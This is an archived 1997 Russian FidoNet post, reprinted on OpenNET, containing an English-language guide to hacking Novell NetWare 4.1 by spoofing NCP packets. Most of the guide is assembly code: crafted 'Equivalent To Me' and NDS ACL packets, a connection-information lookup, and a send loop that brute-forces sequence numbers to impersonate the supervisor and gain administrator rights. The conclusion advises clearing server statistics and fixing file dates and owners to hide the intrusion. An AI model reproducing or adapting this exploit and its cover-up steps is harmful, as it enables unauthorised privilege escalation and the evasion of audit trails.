The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Томская атака (security ipx)

<< Предыдущая ИНДЕКС Поиск в статьях src Установить закладку Перейти на закладку Следующая >>
Ключевые слова: security, ipx,  (найти похожие документы)
_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _ From : Eugene Ilchenko 2:5005/31.11 26 Dec 97 18:17:00 Subj : Томская атака ________________________________________________________________________________ Hi All! Вот почти последний ваpиант нашего описания взлома. Извините, что по английски, но последний pусский ваpиант я не нашел :((( Этот-же файл можно найти по адpесу http://www.tsu.tu/~eugene/ -> NetWare Hacking book -> How to hack Novell NetWare 4.11 Более детальное описание можете найти в 6-м номеpе LANMagazine, или по адpесу: Впpочем, сюда-же есть ссылка и с моей стpанички. Всего наилучшего в Hовом Году! :) ------------------------------------------------------------------------------- HACKING NOVELL NETWARE 4.1 ---------------------------------- Version 1.3 by Ilchenko Eugene and Gusev Igor 1997 Contents Introduction 1.Exchange packets principle 2.The common idea of cracking 3.How to get Admin's rights 4.Consequences Conclusion Introduction As you know everything can be broken and NOVELL NETWARE is not an exeption. But the time for cracking something is defined by the time of geting information about it. The more information you will find the more easy it will be for you to crack. In this documentation we'd like to tell you some sence about NOVELL net and about cracking it. This document is only for studying.In this document only the common principles are discussed. If you still wonna hack you should know IPX and NCP (netware core protocol) and think little for yourself. Excuse our English - it is not our first language. :) 1.Exchange packets principle. First of all the server and workstations send packets to each other accoding to the special protocol known as Netware Core Protocol ( NCP ) based on the IPX protocol. Every packet is sighed with its own number from 0 to 255 stored in one byte. This field is known as Sequence Number. Look at the packet structure. The packet structure Field Number Memory Meaning of bytes location ------------------------ Phisical packet header ------------------------ ReceiverAddress 6 Normal The address of the workstation that will recive the packet SenderAddress 6 Normal The address of the workstation that sends the packet DataLength 2 High-Low The packet length ------------------------- IPX protocol header -------------------------- CheckSum 2 Normal The packet checksum. IpxLength 2 High-Low The IPX packet length HopCount 1 - Number of bridges to overcome PacketType 1 - The packet type. DestNetwork 4 Normal The destination subnet address DestNode 6 Normal The destination workstation address DestSocket 2 Low-High The destination programme socket SourceNetwork 4 Normal The source subnet addres SourceNode 6 Normal The source workstation address SourceSocket 2 Low-High the source programme socket ------------------------- NCP protocol header -------------------------- RequestType 2 Low-High Depends on the request SequenceNumber 1 - The number of the packet ConectionNumberLow 1 - The conrction number.During the lo- gin operation every station are as- signed with the its own number TaskNumber 1 - The task number. It is for worksta- ion I guess. Never mind about it. Just set it zero or whatever number you like. ConectionNumberHigh 1 - Always 0. FunctionCode 1 - The function identificator. -------------------------- NCP protocol data --------------------------- - - - Depends on the requet type and the function The initiater is the workstation. It sends a requirement packet and waits for an answer. The server receives the packet , check the station address , the subnet address , the socket , the conection and the sequence number. If something is wrong the server reject to accomplish the requirement operation and send the answer. 2.The common idea of cracking. As was said above the server checks all the packets it receives. But if to form the packet like the other workstation, set its addresses in the packet , set its connection number and so on and then to send it to the net the server will never know whos request it has accomplished.The main difficulty is the sequens number because others fields can be obtained from the server with the usual functions. To make sure server the server has accomplish the operation you should send the same packet 255 times with different sequens numbers. 3.How to get supervisor's rights You can get supervisor's rights just having become supervisor equvalent. There is a function known as EQUIVALENT TO ME that you should send in name of supervisor. Look at the packet structure. The packet structure with function EQUIVALENT TO ME ------------------------ Phisical packet header ------------------------ RecAdr db 00,20h,0afh,4fh,5fh,0ah SndAdr db 00,20h,0afh,089h,022h,0afh DataLength db 01,68h -------------------------- IPX packet header --------------------------- dw 0ffffh IpxLength db 01,67h db 0 db 17 DestNetwork db ?,?,?,? DestNode db ?,?,?,?,?,? DestSocket db 04,51h SourceNetWork db 00,00,01,02 SourceNode db ?,?,?,?,?,? SourceSocket db 40h,03 -------------------------- NCP packet header --------------------------- db 22h,22h SequenceNumber db 48 ConnectionNumberLow db 24 db 4 db 0 db 68h db 2 --------------------------- NCP packet data ---------------------------- dd -1 dd 514 S1_2: dd offset S1_1 - offset S1_2-4 dd 0 dd 9 dd 0 dd 0 dd 0 S1ID db 67h,02h,00,06h dd 1 dd 5 dd 34 db 'E',0,'q',0,'u',0,'i',0,'v',0,'a',0,'l',0,'e',0 db 'n',0,'t',0,' ',0,'T',0,'o',0,' ',0,'M',0,'e',0 dd 0 dd 1 dd 26 db '3',0,'1',0,'0',0,'7',0,'.',0,'I',0,'N',0,'F',0 db '.',0,'T',0,'S',0,'U',0 ; !!! - two last strings - your full network name (like 3107.inf.tsu) S1_1 The same packet but for NDS: ;Ethernet Level header------------------------------------- RecAdr db -1,-1,-1,-1,-1,-1 SndAdr db 00,20h,0afh,089h,022h,0afh DataLength db 00,0aeh-26 ;IPX header------------------------------------------------ dw 0ffffh IpxLength db 00,0aeh-26 db 0 db 17 DestNetwork db ?,?,?,? ;Internal network address of your server DestNode db 0,0,0,0,0,1 ;node of your server (as default) DestSocket db 04,51h ;socket (dont change it)(NCP) SourceNetWork db ?,?,?,? ; Your Administrator SourceNode db ?,?,?,?,?,? ; Network SourceSocket db ?,? ; Address ;NetWare Core Protocol level------------------------------- db 22h,22h SequenceNumber db 48 ; 255 - 0 ConnectionNumberLow db 24 ; Connection number of your main admin db 4 db 0 db 68h db 2 ;NDS level------------------------------------------------- dd -1 dd 514 So_2: dd offset So_1 - offset So_2+2 ; Message Length dd 0 dd 9 dd 0 dd 0 dd 0 ID db ?,?,?,? ;ID of [Root] !!! found it and change dd 1 dd 2 dd 8 db 'A',0,'C',0,'L',0,0,0 dd 1 So_3: dd So_1-So_3 ;ACL length dd 30 db '[',0,'E',0,'n',0,'t',0,'r',0,'y',0,' ',0 db 'R',0,'i',0,'g',0,'h',0,'t',0,'s',0,']',0 dd 0 ;---------------------------------------------------------- dd ? ;Length of your NDS name So_1: db 100 dup (?) ; Your NDS name To get supervisor's address,subnet,socket,ID,conection number you can via the function Get Connection Information. Look below. Get Connection Information ah=E3h ds:si=> ConReq dw 2 - length db 16h - subfunction db ? - Conection Number es:di=> ConRep dw 62 - length db 4 dup (?) dw ? - User Type db 56 duo (?) - User login name int 21h You can send the packet via IPX driver (function 9) but in this case you have not access to the phisical packet header. I guess the server does not check the sender address there. You can also send the packet via LSL driver but it is too difficult. The simplest way is to send the packet via ODIPKT driver (function 4). Send Packet Via Odipkt ah=4 cx=length ds:si=>packet int 60h C=1 if error The procedure of sending packets Send proc mov SequenceNumber,0 @@1: push ds push es mov ah,4 mov cx,Length mov si,offset Packet int 60h pop es pop ds jc @@1 mov cx,1000 loop $-2 dec SequenceNumber jne @@1 ret Send endp 4.Consequences. After answering a packet a server waits for another one with incremented sequence number. If you try to squees your packet into the work between the server and the workstation then there will appear the dissequence of packets and the user will hang up. But you can avoid this by sending 256*255 packets more. Conclusion If you realize the program accoding to this documentation you will get big rights. I hope you will not harm anybody. Moreover,do not forget that all what you do is fixed on the server.Clear off the server statis- tic. Don't forget about dates and file owners. Copyright 1997. by dISEr&_Igor_ ( All comments, ideas, and questions send to ------------------------------------------------------------------------------- E-Mail:; IRC - DALNet, nick - dISEr Eugene. --- * Origin: -> Я - не я и программа не моя :) <- (2:5005/31.11)

<< Предыдущая ИНДЕКС Поиск в статьях src Установить закладку Перейти на закладку Следующая >>

 Добавить комментарий

Inferno Solutions
Hosting by

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру